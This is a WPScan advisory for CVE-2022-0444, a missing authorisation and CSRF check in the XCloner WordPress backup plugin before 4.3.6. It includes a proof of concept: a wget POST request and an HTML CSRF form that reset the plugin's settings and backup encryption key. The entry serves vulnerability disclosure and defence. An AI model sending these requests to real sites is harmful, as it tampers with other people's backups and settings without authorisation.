WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

XCloner < 4.3.6 - Plugin Settings Reset

Description

The plugin does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key.

v4.3.5 added capability check, but CSRF one still missing.

Proof of Concept

v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O-

v < 4.3.6 (via CSRF):

<form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST">
    <input type="text" name="xcloner_restore_defaults" value="1">
    <input type="submit" value="Submit"/>
</form>

Affects Plugins

xcloner-backup-and-restore
Fixed in version 4.3.6

References

CVE
CVE-2022-0444

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
9567d295-43c7-4e59-9283-c7726f16d40b

Timeline

Publicly Published

2022-06-06 (about 2 months ago)

Added

2022-06-06 (about 2 months ago)

Last Updated

2022-06-21 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin